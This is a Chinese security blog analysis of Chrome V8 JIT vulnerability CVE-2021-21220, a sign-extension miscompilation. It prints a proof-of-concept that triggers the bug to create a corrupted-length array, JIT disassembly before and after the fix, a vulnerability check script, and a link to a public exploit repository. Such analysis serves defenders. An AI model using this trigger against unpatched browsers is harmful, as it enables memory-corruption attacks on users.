详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220

admin 2021年7月20日23:54:07评论161 views字数 3191阅读10分38秒阅读模式

详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220 聚焦源代码安全,网罗国内外最新资讯!


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220
前言


CVE-2021-21220 是4月13号在 github 上公开的一个半 0day v8 引擎 JIT 模块漏洞。由于当时最新stable版本 (89.0.4389.114) 和 beta 版本 (90.0.4430.70) 的 Chrome 均未集成修复后的 V8 版本,所以该漏洞可以影响最新版本的 Chrome,当然,也影响基于 V8 的其它广泛使用的浏览器。

目前最新版本的 Chrome 已修复该漏洞,建议大家尽快更新 Chrome 浏览器。


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220
漏洞分析


拿到PoC之后,首先进行简单的分析和精简,方便之后的调试分析。

var _arr = new Uint32Array([2**31]);function foo(a) {    var x = 1;  x = (_arr[0] ^ 0) + 1;  x = Math.abs(x);  x -= 2147483647;  x = Math.max(x, 0);  x -= 1;  if(x==-1) x = 0;  var arr = new Array(x);  arr.shift();  var cor = [1.1, 1.2, 1.3];  return [arr, cor];}
for(var i=0;i<0x3000;++i) foo(true);
var x = foo(false);var arr = x[0];var cor = x[1];


jit 比较熟悉的同学,很容易就可以发现 foo 函数是被优化的函数。foo 函数的主要功能是:1、对变量 进行多种基本操作;2、涉及数组的相关操作。仔细看一下数组这部分,它主要依赖于变量 的值。 

var _arr = new Uint32Array([2**31]);//2**31function foo(a) {    var x = 1;  x = (_arr[0] ^ 0) + 1;// (2**31)^0+1  x = Math.abs(x);  x -= 2147483647;//2**31-1=2147483647  x = Math.max(x, 0);  x -= 1;  if(x==-1) x = 0;    return x}print(foo(false));for(var i=0;i<0x3000;++i)    foo(true);var x = foo(false);print(x)


去掉 array 数组那部分的精简,运行poc,结合输出的结果,说明我们的推断是正确的。

d8 poc.js 01


进一步分析发现,变量 x 的值和 2**31(2147483648) 有很大关系。有符号的int32 整数范围 [-2147483648~2147483647],在这个地方进行加减操作,在64位平台下很容易发生 int32int64 之间的相互转换。事实上我们发现 v8 团队提交的一个 commit 修复链接 [compiler][x64] Fix bug in InstructionSelector::ChangeInt32ToInt64,恰好是这个 bug 的 patch。这个commit中包含了对应的回归测试用例。为了调试方便,我们使用该测试用例。

const arr = new Uint32Array([2**31]);function foo() {  return (arr[0] ^ 0) + 1;}%PrepareFunctionForOptimization(foo);print(foo());%OptimizeFunctionOnNextCall(foo);print(foo());

执行

d8 poc.js --allow-natives-syntax-2147483647  //runtime2147483649   //jit


arr[0]= 2**31(2147483648);arr[0] ^ 0 = -2147483648在32位有符号的情况下为0x8000 0000,而 arr[0] 在32位无符号的情况下也为 0x8000 0000,之后执行加1: runtime 阶段,-2147483648+1=0xFFFF FFFF 8000 0001 = -2147483647没有问题;而 jit 阶段,错误地将32位无符号0x8000 0000,扩展为64位0x0000 0000 8000 0000,然后加1得到0x0000 0000 8000 0001 = 2147483649


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220


结合对应的 patch 代码和注释,ChangeInt32ToInt64的输入是一个有符号的32位整数,所以任何时候都应该做符号扩展。

详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220


最后我们来看一下 jit 生成的代码,这里通过 | mov ecx,dword ptr [rcx]|,错误地丢失了符号。而在 fix 之后的 jit 代码中通过 | movsxd rcx,dword ptr [rcx]| 正确地带符号扩展 rcx

JIT代码:

0000009B000C4165  mov         ecx,dword ptr [rcx] //RCX = 00000000800000000000009B000C4167  mov         r10,qword ptr [9B000C4146h]  0000009B000C416E  cmp         r10,rcx  0000009B000C4171  ja          0000009B000C4182  0000009B000C4173  xor         edx,edx  0000009B000C4175  mov         dl,2  0000009B000C4177  mov         r10,qword ptr [9B000C4052h]  0000009B000C417E  call        r10  0000009B000C4181  int         3  0000009B000C4182  add         rcx,1  //RCX = 00000000800000010000009B000C4186  mov         edi,ecx


修复 JIT代码:

000001B0000C4165  movsxd      rcx,dword ptr [rcx]  // RCX = FFFFFFFF80000000000001B0000C4168  add         rcx,1  // RCX = FFFFFFFF80000001


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220
验证脚本


var _arr = new Uint32Array([2**31]);
function foo(a) { var x = 1; x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); return arr}
for(var i=0;i<0x3000;++i) foo(true);
var x = foo(false);if(x.length){ alert("vuln is exist")}


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220
参考


  • https://github.com/r4j0x00/exploits/tree/master/chrome-0day

  • https://chromium-review.googlesource.com/c/v8/v8/+/2820971


就在今天,奇安信代码安全实验室帮助微软修复严重的远程内核级漏洞,获官方致谢。详请请见本日次条推送。




奇安信开源卫士20210414.659版本已支持对该漏洞的检测。


详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220






推荐阅读

影响 Chrome、Edge 等浏览器的 V8 引擎0day
详细分析PHP源代码后门事件及其供应链安全启示
微软“照片”应用Raw 格式图像编码器漏洞 (CVE-2021-24091)的技术分析
Windows DNS Server 远程代码执行漏洞 (CVE-2021-24078) 的详细原理分析
FireEye 红队失窃工具大揭秘之:分析复现SolarWinds RCE 0day (CVE-2020-10148)



题图:Pixabay License


本文由奇安信代码卫士原创出品。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。



详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220
详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的

产品线。

   详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220 觉得不错,就点个 “在看” 或 "” 吧~


本文始发于微信公众号(代码卫士):详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月20日23:54:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   详细分析 Chrome V8 JIT 漏洞 CVE-2021-21220https://cn-sec.com/archives/334532.html

发表评论

匿名网友 填写信息